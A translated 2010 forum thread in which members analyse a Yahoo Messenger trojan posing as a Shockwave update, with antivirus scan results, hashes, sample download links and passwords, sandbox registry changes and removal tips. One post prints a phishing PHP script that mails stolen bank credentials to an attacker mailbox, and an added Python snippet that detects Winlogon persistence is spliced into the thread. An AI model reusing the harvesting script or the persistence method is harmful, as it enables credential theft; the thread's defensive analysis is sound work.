#1, begood (Moderator), 02-01-2010 08:02 AM

Another Yahoo virus




It passes itself off as an Adobe Shockwave Player update.
Cloud Antivirus detected it immediately.

VirusTotal analysis:
Code:
http://www.virustotal.com/analisis/c085bc9738dca68a0242683ac0a825440af09f4a08fe74a441e0f8efefb313c5-1265013900
Code:
 File setup.exe received on 2010.02.01 08:45:00 (UTC)
Current status: finished
Result: 23/40 (57.50%)
Antivirus 	Version 	Last Update 	Result
a-squared 	4.5.0.50 	2010.02.01 	Dialer!IK
AhnLab-V3 	5.0.0.2 	2010.01.31 	Win-Trojan/Mdshell.3016192
AntiVir 	7.9.1.154 	2010.01.31 	DIAL/Generic
Antiy-AVL 	2.0.3.7 	2010.02.01 	-
Authentium 	5.2.0.5 	2010.01.31 	W32/Trojan-Gypikon-based.DE!Maximus
Avast 	4.8.1351.0 	2010.01.31 	Win32:Malware-gen
AVG 	9.0.0.730 	2010.01.31 	-
BitDefender 	7.2 	2010.02.01 	Win32.Worm.IM.J
CAT-QuickHeal 	10.00 	2010.02.01 	-
ClamAV 	0.96.0.0-git 	2010.02.01 	-
Comodo 	3780 	2010.02.01 	Heur.Suspicious
DrWeb 	5.0.1.12222 	2010.02.01 	-
eSafe 	7.0.17.0 	2010.01.31 	Win32.DIALGeneric
eTrust-Vet 	35.2.7274 	2010.02.01 	Win32/Tnega.ADE
F-Prot 	4.5.1.85 	2010.01.31 	W32/Trojan-Gypikon-based.DE!Maximus
F-Secure 	9.0.15370.0 	2010.01.31 	Win32.Worm.IM.J
Fortinet 	4.0.14.0 	2010.02.01 	W32/Delf.TUP!tr
GData 	19 	2010.02.01 	Win32.Worm.IM.J
Ikarus 	T3.1.1.80.0 	2010.02.01 	Dialer
Jiangmin 	13.0.900 	2010.01.28 	-
K7AntiVirus 	7.10.960 	2010.01.29 	-
Kaspersky 	7.0.0.125 	2010.02.01 	Trojan.Win32.Agent2.cnkw
McAfee 	5878 	2010.01.31 	Generic.dx!mgr
McAfee+Artemis 	5878 	2010.01.31 	Artemis!FA8305E3E69B
McAfee-GW-Edition 	6.8.5 	2010.02.01 	Dialer.Generic
Microsoft 	1.5406 	2010.02.01 	-
NOD32 	4823 	2010.02.01 	-
Norman 	6.04.03 	2010.01.31 	-
nProtect 	2009.1.8.0 	2010.02.01 	-
Panda 	10.0.2.2 	2010.01.31 	Trj/CI.A
PCTools 	7.0.3.5 	2010.02.01 	Trojan-PSW.Bancos
Rising 	22.33.00.04 	2010.02.01 	-
Sophos 	4.50.0 	2010.02.01 	Mal/Generic-A
Sunbelt 	3.2.1858.2 	2010.01.31 	Trojan.Win32.Generic!BT
Symantec 	20091.2.0.41 	2010.02.01 	Infostealer.Bancos
TheHacker 	6.5.1.0.175 	2010.02.01 	-
TrendMicro 	9.120.0.1004 	2010.02.01 	-
VBA32 	3.12.12.1 	2010.01.29 	-
ViRobot 	2010.2.1.2165 	2010.02.01 	-
VirusBuster 	5.0.21.0 	2010.01.31 	-
Additional information
File size: 3016192 bytes
MD5   : fa8305e3e69b27a7b95dcf2cec0fcb9f
SHA1  : a4552f2899871702f83969ba01ce50228ab8c6fd
SHA256: c085bc9738dca68a0242683ac0a825440af09f4a08fe74a441e0f8efefb313c5
original download page:
Code:
http://dl.fisier.ro/files/dh5kgfingf335je/setup.exe.html
mirror:
Code:
http://www.2shared.com/file/11045927/5afa1303/setup_virus.html
password:
Code:
begood@rstcenter.com
the page you receive via Yahoo IM:
Code:
http://roamateursxx.freehostking.com/profile.php?user=[ID-ul tau]
mirror for this page:
Code:
http://www.2shared.com/file/11045982/d07f0f06/virus_downloadpage.html
same password.

the message I received via Y! IM:
did you make this profile yourself? [Only registered users can see the links.]

LE: I like how the attackers thought this through.
They send a link to a porn profile that does not display correctly for the victim. Because it affects the victim directly (the victim's ID is in the link), they have to install that "update" in order to see their own profile. Voila, new trojan installed.

#2, Nytro (Administrator), 02-01-2010 09:40 AM

Thanks.

The virus copies itself to Windows/system32/cgsb.exe and sets itself to run at startup in ( HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ). The icon is the Internet Explorer one.

To get rid of it, delete that file. Oddly, in the startup entry the path of the executable appears with a comma in front of it.

When run it shows an ugly ProgressBar and at the end gives an error: "Unable to Register ActiveX...".

I think it uses OpenSSL; it copies libeay32.dll and ssleay32.dll into system32. I'm not sure. I think that "setup", which is probably a binder written in Delphi, contains 5 files. It also copies YahooAuth2.dll ( Company Name says Bricksoft, not Yahoo!, odd ). And I think there is also MSIMTF.DLL ( Microsoft ).

EDIT: On the second run it copied itself under the name xdbyqdn.exe. That means the name is random, or it may have a certain number of possible names.

TO GET RID OF IT: Go into Windows\system32 and delete the executable(s) with the INTERNET EXPLORER ( 6 ) icon.

I'll be back with more details.
Last edited by Nytro; 02-01-2010 at 10:23 AM.

#3, ROFL, 02-01-2010 10:31 AM


It would be good to know how it sends the messages to the contacts in the list.

#4, Flubber (Banned), 02-01-2010 11:37 AM


"speak of the devil" (reading about it, in this case)

Quote:
x (2/1/2010 2:30:58 PM): Georgiana: did you make this profile yourself? hxxp://roamateursxx.freehostking.com/profile.php?user=his id
x: what, so you can trick me
x: and I install that thing, no?
x: )
x: and 2, look, what you're doing isn't nice
x: and then you wonder why people beat you up )
x (2/1/2010 2:31:06 PM): is there any point in also telling her she has a small brain?
Flubber (2/1/2010 2:31:11 PM): [Only registered users can see the links.]
Flubber (2/1/2010 2:31:13 PM): I was just reading about it

#5, begood (Moderator), 02-01-2010 11:43 AM


[Only registered users can see the links.]

pile in here.
this one: [Only registered users can see the links.]

LE: Anubis analysis:
[Only registered users can see the links.]

Nytro, you missed that it also creates a fourth file:
C:\WINDOWS\system32\YahooAuth2.dll
C:\WINDOWS\system32\libeay32.dll
C:\WINDOWS\system32\ssleay32.dll
C:\WINDOWS\system32\tqsbsf.exe

[Only registered users can see the links.]

so it has a keylogger and a stealer too
readers, be very careful!

#6, Nytro (Administrator), 02-01-2010 02:49 PM


It reads:

HKCU\Software\Yahoo\pager\Yahoo! User ID
HKCU\Software\Yahoo\pager\ETS
HKCU\Software\Yahoo\pager\Save Password

It steals the Messenger password. It copies the ID and the password to:

HKLM\SOFTWARE\first\USER
HKLM\SOFTWARE\first\PAROLA

It's badly written: it reads Yahoo! User ID like crazy... It keeps reading it until it is filled in. It reads the data like a keylogger, as the keys are pressed; it probably checks the active window.

Let's see what else I can find out...
Last edited by Nytro; 02-01-2010 at 03:20 PM.

#7, tdxev, 02-01-2010 05:06 PM


Probably another version.. it copies itself under the name ("efoqj.exe")
I swore for half a day at one 4 days ago when I got it ) I thought it was a trojan,
then I saw that it sent the same message again and I realized it had nothing to do with it...

the link I received... the first time, the next day it no longer worked,
[Only registered users can see the links.]

the link to the executable file... still works (I didn't feel like reporting the page on [Only registered users can see the links.] if you want to...)
[Only registered users can see the links.]

Virus Total
[Only registered users can see the links.]

Anubis
[Only registered users can see the links.]

System snapshot after running update.exe:
Code:
File	Added	C:\WINDOWS\system32\YahooAuth2.dll
File	Added	C:\WINDOWS\system32\efoqj.exe
File	Added	C:\WINDOWS\system32\libeay32.dll
File	Added	C:\WINDOWS\system32\ssleay32.dll
Reg Key	Added	HKLM\SOFTWARE\last
Reg Val	Added	HKLM\SOFTWARE\last\Parola	
Reg Val	Added	HKLM\SOFTWARE\last\USER	
Reg Val	Changed	HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	"Explorer.exe ,C:\WINDOWS\system32\efoqj.exe"	(old value="Explorer.exe")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\First Counter	"4076"	(old value="3424")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\First Help	"4077"	(old value="3425")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\Last Counter	"4088"	(old value="3436")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\Last Help	"4089"	(old value="3437")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance\Object List	"4076 4082"	(old value="3424 3430")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count	"0"	(old value="1")
Reg Val	Changed	HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance	"0"	(old value="1")
Reg Key	Deleted	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d
Reg Val	Deleted	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d\ILUsageMask	BINARY SIZE=1 MD5=00594FD4F42BA43FC1CA0427A0576295
Reg Val	Deleted	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d\NIUsageMask	BINARY SIZE=1 MD5=EC2D11028766E06AC33648E2F0A67320
Reg Val	Deleted	HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0	SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}
Re: Another Yahoo virus
02-01-2010, 05:42 PM   #8
ROFL

What I found on the page tdxev specified, hxxp://profilexx.haos.ro:

A file named <gohi.php> that contains:
Code:
<?php
// Concatenate the submitted form fields (nume, PIN, comp, oras, reg, user, pass)
// into one line; this is the data harvested from the form that posts here.
$val = $_POST['nume'] . "  " . $_POST['PIN'] . "  " . $_POST['comp'] . "  " . $_POST['oras']
     . "  " . $_POST['reg'] . "  " . $_POST['user'] . "  " . $_POST['pass'];

$to      = "alinuzza235@yahoo.com";              // collection mailbox
$subject = "From ip: " . getenv("REMOTE_ADDR");  // victim's IP goes in the subject
$email   = "fraier@tds.com";
$message = $val;
$headers = "From: $email";
$sent    = mail($to, $subject, $message, $headers);
if ($sent) {
    // tells the victim to log in to BT24 again, so the failure looks like a glitch
    print "Accesati din nou aplicatia BT24 pentru autentificare.";
} else {
    print "ERROR";
}
?>
Probably the server sends a request to this and he receives the logs at <alinuzza235@yahoo.com>.

Also found there:

hxxp://profilexx.haos.ro/server.exe
hxxp://profilexx.haos.ro/profile.php
hxxp://profilexx.haos.ro/index.htm (identical to profile.php)
Re: Another Yahoo virus
02-01-2010, 05:57 PM   #9
Gugulica

I can't delete it. No executable with the Explorer icon shows up. Any other methods?
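The sandbox diff posted earlier in the thread records HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell changing from "Explorer.exe" to "Explorer.exe ,C:\WINDOWS\system32\efoqj.exe", an autostart location that a search for Explorer-iconed files will not reveal. The following is an added example, not code from the thread or any tool: it parses lines in the same tab-separated format as that sandbox output and flags changes to autostart locations. The line format, the sample lines and the Run/RunOnce check are assumptions reconstructed from the posted output.

```python
import re

# One sandbox diff line: "Reg Val"/"Reg Key", operation, value path, new data
# (quoted when Changed) and, for Changed lines, "(old value=...)".
LINE_RE = re.compile(
    r'^Reg (?:Val|Key)\t(?P<op>Added|Changed|Deleted)\t(?P<path>[^\t]+)'
    r'(?:\t"?(?P<new>[^\t"]*)"?)?(?:\t\(old value="(?P<old>[^"]*)"\))?$'
)

def parse_line(line):
    """Parse one diff line into a dict (op, path, new, old); None if it does not match."""
    m = LINE_RE.match(line.rstrip("\r\n"))
    return m.groupdict() if m else None

def autostart_reason(entry):
    """Return why this change looks like a persistence mechanism, or None if benign."""
    low = entry["path"].lower()
    new = entry.get("new") or ""
    if low.endswith("\\winlogon\\shell"):
        # Shell is a comma-separated list; on a clean box it holds only explorer.exe.
        parts = [p.strip() for p in new.split(",")]
        extra = [p for p in parts if p and p.lower() != "explorer.exe"]
        return ("Winlogon Shell launches extra program(s): " + ", ".join(extra)) if extra else None
    if "\\currentversion\\run\\" in low or "\\currentversion\\runonce\\" in low:
        return "Run/RunOnce entry %s: %s" % (entry["op"].lower(), new)
    return None

def scan(diff_text):
    """Return [(path, reason)] for each diff line that touches an autostart location."""
    hits = []
    for line in diff_text.splitlines():
        entry = parse_line(line)
        reason = autostart_reason(entry) if entry else None
        if reason:
            hits.append((entry["path"], reason))
    return hits

def _row(*cols):
    return "\t".join(cols)

# Constructed sample in the thread's sandbox-output format; the Shell line reproduces
# the change the thread reports, the other three are ordinary noise.
SAMPLE_DIFF = "\n".join([
    _row("Reg Val", "Added", r"HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\StartTime", "0"),
    _row("Reg Val", "Changed", r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last Counter", '"4088"', '(old value="4074")'),
    _row("Reg Val", "Changed", r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
         r'"Explorer.exe ,C:\WINDOWS\system32\efoqj.exe"', '(old value="Explorer.exe")'),
    _row("Reg Key", "Deleted", r"HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d"),
])
```

scan(SAMPLE_DIFF) returns only the Winlogon Shell entry; pass it the text of a full diff to check another sample the same way.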
Re: Another Yahoo virus
02-01-2010, 06:02 PM   #10
SympleBoy22

The virus is very cool. 20 antiviruses detect it... Now that's a virus.
Copywr0ng (c) 2009 Miercuri catre Joi - RST